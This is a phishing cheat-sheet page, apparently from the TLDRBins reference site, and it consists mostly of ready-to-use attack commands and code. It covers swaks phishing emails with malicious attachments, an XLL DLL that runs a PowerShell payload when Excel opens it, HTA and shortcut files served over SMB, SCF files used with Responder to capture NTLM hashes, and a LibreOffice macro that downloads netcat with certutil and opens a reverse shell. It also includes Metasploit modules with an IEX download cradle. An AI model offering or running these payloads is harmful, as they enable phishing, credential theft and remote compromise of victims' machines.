TLDRBins TLDRBins / Phishing

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Send Email

swaks --to '<VICTIM>@<DOMAIN>' --from 'attacker@<DOMAIN>' --server '<DOMAIN>' --header 'This is not a malicious file' --body 'Check this out: http://<LOCAL_IP>:<PORT>' --attach '@<FILE>'

Sample Output:
TO-DO

$obj = New-Object -ComObject WScript.Shell

Sample Output:
TO-DO
$link = $obj.CreateShortcut("C:\ProgramData\Calculator.lnk")

Sample Output:
TO-DO
$link.TargetPath = "C:\ProgramData\rev.exe"

Sample Output:
TO-DO
$link.Save()

Sample Output:
TO-DO

shell.c

#include <windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void); 

void __cdecl xlAutoOpen() {
    // Triggers when Excel opens
    WinExec("<POWERSHELL_3_BASE64>", 1); // Replace your payload
}

BOOL APIENTRY DllMain( HMODULE hModule,
                    DWORD  ul_reason_for_call,
                    LPVOID lpReserved
                    )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Sample Output:
TO-DO

1. Compile shell.c in Linux

x86_64-w64-mingw32-gcc -fPIC -shared -o shell.xll shell.c -luser32

Sample Output:
TO-DO

2. Send Email with the Malicious xll File

swaks --to '<VICTIM>@<DOMAIN>' --from 'attacker@<DOMAIN>' --server '<DOMAIN>' --header 'This is not a malicious file' --body 'This is not a malicious file' --attach '@shell.xll'

Sample Output:
TO-DO

Ref: revshells.com

1. Start a Local SMB Server

# In our local Linux machine
impacket-smbserver -smb2support share .

Sample Output:
TO-DO

2. Create a Malicious hta File in local Linux SMB Share

<html>
    <head>
        <HTA:APPLICATION ID="shell">
        <script language="javascript">
            var c = "<POWERSHELL_3_BASE64>";  
            new ActiveXObject('WScript.Shell').Run(c, 0, true); 
        </script>
    </head>
    <body>
        <script>self.close();</script>
    </body>
</html>

Sample Output:
TO-DO

3. Create a Shortcut File in Target Windows

# In target Windows machine (powershell)
$url = "file://<LOCAL_IP>/share/shell.hta"

Sample Output:
TO-DO
$shortcutPath = "C:\ProgramData\shell.url"

Sample Output:
TO-DO
$shortcutContent = "[InternetShortcut]`r`nURL=$url"

Sample Output:
TO-DO
Set-Content -Path $shortcutPath -Value $shortcutContent

Sample Output:
TO-DO

Ref: revshells.com

If Any Interaction from Target to SMB Share

1. Start Responder

# In our local Linux machine
sudo responder -I tun0

Sample Output:
TO-DO

2. Create a Malicious Shortcut

[Shell]
Command=2

IconFile=\\<LOCAL_IP>\icon

Sample Output:
TO-DO

3. Upload the Malicious Shortcut

# In our local Linux machine
smbclient -N \\\\<TARGET>\\share\\

Sample Output:
TO-DO
mput evil.scf

Sample Output:
TO-DO

Manual

+--------------------------------------------------------+
| 1. "Tools" > "Macros" > "Organize Macros" > "Basic..." |
| 2. "Untitled 1" > "Standard" > "New"                   |
| 3. "Paste the code below"                              |
+--------------------------------------------------------+

Sample Output:
TO-DO

Sub OnLoad
    shell("cmd /c certutil -urlcache -split -f http://<LOCAL_IP>:<PORT>/nc64.exe C:\programdata\nc64.exe && C:\programdata\nc64.exe -e cmd <LOCAL_IP> <LOCAL_PORT>")
End Sub

Sample Output:
TO-DO

+-----------------------------------------------------------+
| 4. "Tools" > "Organize Macros" > "Basic..." > "Assign..." |
| 5. "Events" > "Open Document" > "OK"                      |
| 6. "SAVE"                                                 |
+-----------------------------------------------------------+

Sample Output:
TO-DO

Metasploit

1. Capture NTLM

# Start responder
sudo responder -I <INTERFACE>

Sample Output:
sudo responder -I tun0

# File write require root privilege
sudo msfconsole -q

Sample Output:
TO-DO
use auxiliary/fileformat/odt_badodt

Sample Output:
TO-DO
set lhost <LOCAL_IP>

Sample Output:
TO-DO
run

Sample Output:
TO-DO

2. RCE

# Start http server
python3 -m http.server <PORT>

Sample Output:
TO-DO
# Start listener
rlwrap ncat -lvnp <LOCAL_PORT>

Sample Output:
TO-DO
# msfconsole
use multi/misc/openoffice_document_macro

Sample Output:
TO-DO
set payload windows/x64/exec

Sample Output:
TO-DO
set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://<LOCAL_IP>:<PORT>/<SHELL_SCRIPT>');"

Sample Output:
TO-DO
set srvhost <LOCAL_IP>

Sample Output:
TO-DO
set lhost <LOCAL_IP>

Sample Output:
TO-DO
run

Sample Output:
TO-DO
msfconsole -q

Sample Output:
TO-DO
search badpdf

Sample Output:
TO-DO
set filename evil.pdf

Sample Output:
TO-DO
set lhost <LOCAL_IP>

Sample Output:
TO-DO
exploit

Sample Output:
TO-DO
python3 ntlm_theft.py -g all -s <LOCAL_IP> -f test

Sample Output:
TO-DO

Ref: ntlm_theft